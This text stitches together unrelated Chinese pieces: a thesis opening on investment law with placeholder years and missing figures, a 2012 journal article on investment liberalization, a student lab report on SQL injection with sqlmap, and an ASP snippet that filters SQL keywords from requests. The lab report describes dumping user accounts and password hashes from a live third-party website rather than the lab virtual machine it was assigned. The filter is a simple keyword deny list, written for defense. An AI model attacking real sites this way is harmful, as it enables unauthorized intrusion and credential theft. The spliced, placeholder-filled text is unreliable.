中国最新投资法和国际投资自由化趋势实践分析 第一章国际投资自由化和国际投资法 进入二十一世纪以后,经济全球化的趋势出现了加速发展的势头,世界各国的经济在全球范围内进行相互的渗透、相互依存。世界各国之间的贸易交流更加的频繁,生产要素在世界各经济体之间流动,资本迫切需要更大的利润,实现各种资源的优化配置,这是当今世界全球化的主要特点。特别是国际投资使得各国的资本在全球范围内的流动,成为推动世界经济向前发展的重要因素。由于绝大多数的国家都已经基本实行了市场经济,从而使国家之间拥有了更多的经济利益的一致性和依存度,这样也为世界各国步入国际投资自由化奠定了客观基础。 第一节国际投资自由化概述 进入八十年代以来,国际投资法的发展趋势是减少对外资的限制,加强对外资的引入,从而促进外国直接投资的发展,投资自由化成为贸易自由化之后的又一次经济浪潮。投资自由化的定义,就是要逐渐在全球范围内取消不利于外资自由流动的外资政策,取消市场上的不和谐因素,为国际资本在世界范围内自由流动消除各种门揽。如今,它是经济全球化的基本内容之一,广大的发展中国家为了促进本民族的发展,也逐步开放国内市场,加入到国际投资自由化的行列中来。 一、国际投资概述 国际直接投资的重要形式之一就是,国际资本要在全球范围内流动,而这也已经作为推动经济全球化的一个强劲动力。 (一)国际直接投资额增长加快,但分布不平衡。进入二十一世纪以来,国际经济局势呈现出多极化的特征,并趋向区域化、一体化的发展趋势,海外直接投资作为国际贸易发展的一个分支,在近年来出现了持续大幅度的增长。联合国贸易和发展会议于20XX年1月28日在日内瓦发布最新一期《全球投资趋势监测报告》称,20XX年全球外国直接投资较20XX年提高11%,达到万亿美元,流向发达经济体、发展中经济体和转型经济体的外国直接投资均出现上升。发展中国家持续了良好的表现,20XX年吸收的国际投资占全球总流入量的52%,总流入量达到新高。但是流入发达经济体的外国直接投资的数额持续减少,占国际投资数额的比重连续第二年处于历史低位,根据所得的数据,发达经济体所占的份额仅为%,
课程名称网络信息安全综合实验实验项目名称SQL注入攻击 一、实验要求 在虚拟机环境查找SQL注入漏洞,通过Metasploit平台的sqlmap攻击实施SQL注入,了解防御措施 二、实验环境 攻击机:BT5r3,IP地址:192.168.200.4 URL:https://www.doczj.com/doc/7213575377.html,/004_zhnews/search/detail.php?id=10832 三、实验步骤 1.打开终端,进入Sqlmap目录:cd /pentest/database/sqlmap 2.通过Sqlmap进行注入攻击。 上图可知:sqlmap探测出URL中的id参数存在着SQL注入点,并包含了基于错误的SQL注入点以及UNION查询注入点。 由上图可知后台数据库的版本是MySQL 5.0,Web应用平台为PHP 4.4.9/Apache 1.3.28。 3.通过Sqlmap获取数据库名。
4.通过Sqlmap获取表名。本实验以efair数据库为例:
5.通过Sqlmap获取列名。以efair数据库里的auth_user为例:课看到有password一列: 6.通过Sqlmap导出password列的内容。
由图可知,获取这个web应用后台数据库的所有作者用户账户和口令哈希,并保存为一个本地的txt文件。该文件如下图:
7.查看Sqlmap支持的Shell。 四、实验小结 本次实验过程中,在寻找可进行注入的URL过程中,尝试着对多个URL进行SQL注入,使用“and 1=1”及“and 1=2”确认网站是否有SQL注入漏洞,试验过程中大部分网站都禁止非法语句,最终实验使用URL为乌云网上提供的一个可进行SQL注入的网站。通过本次
2012年第2期总第212期 Foreign Economic Relations &Trade 【投资与合作】 国际投资自由化与 中国经济发展关系研究 沈 微 (黑龙江大学,黑龙江哈尔滨150080) [摘 要]投资自由化是经济全球化的主要表现形式之一,促进了以跨国公司为中心的全球自由投资体 系的建立, 并呈现出投资自由化与投资保护主义并行、投资主体区位特征明显、投资导向发生变化等特点。投资自由化对中国经济发展既有促进产业升级、提高就业率等积极影响,同时也有冲击民族工业、加剧经济 资源流失等消极影响。我国应积极鼓励企业“走出去”,继续积极参与国际经济事务,努力推动投资自由化进程向更开放化发展。 [关键词]国际投资自由化;中国;经济发展 [中图分类号]F830.59[文献标识码]A [文章编号]2095-3283(2012)02-0060-03基金项目:黑龙江大学学生学术科技创新项目,项目编号:20110247。 一、投资自由化的现状 为顺应经济全球化趋势,避免被发达国家主导的全球统一市场边缘化, 世界上一些国家开始着手扫清自身制度障碍,竞相放松市场管制,以跨国公司为代表的全球自由投资体系逐渐形成,并表现出一些新的特征。 (一)全球投资规模迅猛增长 近年来全球投资迅猛发展,不仅是资本整体流动规模庞大,而且流动速度加快,FDI 增长尤为突出。1990年之前, 全球国际直接投资总额年均不超过2千亿美元,之后逐年增加,到2007年达到约2万亿美元峰值,尔后受国际金融危机影响, 投资规模有所下降,但仍保持在1万亿美元以上, 2010年全球FDI 总额达1.35万亿美元。(二)跨国公司主导全球自由投资体系的建立跨国公司作为经济全球化的微观组成部分以及FDI 的主要载体,在建立全球自由投资体系过程中起着不容忽视的作用,其在生产规模、资本水平、经营战略、研发能力、 管理手段及销售网络等方面具有全球性优势,对发展“无国界经济”具有十分巨大的推动作用。跨国公司的“全球性公司”战略定位,使得近年来大型跨国并购数量急速上升, 成为全球FDI 的主要方式之一。(三)投资主体层次特征明显,投资导向发生变化在全球自由投资体系中,发达国家因其投资面广、资本雄厚、投资速度迅猛等优势,居于第一层次;新兴经济体、 石油输出国组织居于投资主体的第二层次,其对外投资潜力巨大,开拓性强,投资范围较广。近年来发展中国家开始在国际投资舞台上崭露头角,但因其实力较弱、资本规模有限,只能有条件地向外输出资本,它们是补充性 的投资力量,构成投资主体的第三层次。 同时,各国的投资导向也发生了较为明显的变化。由于近年来各国经济迅猛发展,世界能源供求间的矛盾不断加深,持续上涨的国际能源价格使得能源安全问题成为影响国家经济安全的重要因素之一。因此,除了投资势头一直良好的服务业外, 全球投资重点重新转向自然资源领域,扭转了多年来自然资源领域吸收外资低迷的不利局面,许多资源大国也成为吸收外资大国。 (四)投资自由化的国际协调逐渐延伸至制度层面经济全球化的不断深入促使各国从不同层次对投资领域进行国际协调。在双边层面, 协调的覆盖范围逐渐扩大,双边投资条约的核心内容呈整体趋同、局部多样化发展;在区域层面, 发达国家在投资自由化方面的区域协调正在向制度化方向发展,政府也专门就国际投资制定相关政策;在多边层面,发展中国家和发达国家签署了一系列旨在推进投资自由化发展的多边条约,尽管涉及领域还较为有限, 但直接影响了成员方投资措施的施行,投资过程中的多边关系得以协调,这都在一定程度上积极推动了全球投资自由化发展。 (五)投资自由化与投资保护主义并行发展 一方面,绝大多数国家积极调整自身的投资促进政策, 努力推动全球投资自由化进程;另一方面,一些国家加大对战略性产业的控制力度,为外资设置市场准入障碍, 使得投资保护主义倾向日益严重。一些发达国家出于对本国产业的保护,开始鼓励资本回流、减缓本国产业资本外移,尤其针对第三产业和高新技术产业。但在全球范围内,尽管投资保护主义在少数国家盛行,但投资自 06
POST GET与COOKIE注入原理 一般的http请求不外乎get 和post两种,如果过滤掉所有post或者get请求中的参数信息中的非法字符,那么也就实现了防SQL注入。 首先定义请求中不能包含如下字符: '|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare 各个字符用"|"隔开,然后再判断Request.QueryString,具体代码如下: get请求的非法字符过滤: dim sql_injdata SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" SQL_inj = split(SQL_Injdata,"|") If Request.QueryString<>"" Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then Response.Write "" Response.end end if next Next End If post请求的非法字符过滤: If Request.Form<>"" Then For Each Sql_Post In Request.Form For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then Response.Write "" Response.end end if next next end if 然后在使用的时候将这两段代码放在数据库连接的文件里一起Include进来即可。